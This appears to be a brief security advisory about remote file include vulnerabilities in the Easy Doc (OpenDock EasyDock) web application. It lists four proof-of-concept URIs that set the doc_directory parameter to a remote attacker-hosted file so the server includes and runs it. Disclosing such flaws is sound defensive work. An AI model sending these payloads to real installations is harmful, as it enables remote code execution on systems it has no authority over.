Easy Doc Doc_Directory Parameter Multiple Remote File Include Vulnerabilities

Easy Doc Doc_Directory Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[OpenDockEasyDock_Path]/sw/lib_up_file/file.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyDock_Path]/sw/lib_up_file/find_file.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyDock_Path]/sw/lib_comment/comment.php?doc_directory=http://www.example.com/inject.txt?
http://www.example.com/[OpenDockEasyDock_Path]/sw/lib_find/find.php?doc_directory=http://www.example.com/inject.txt?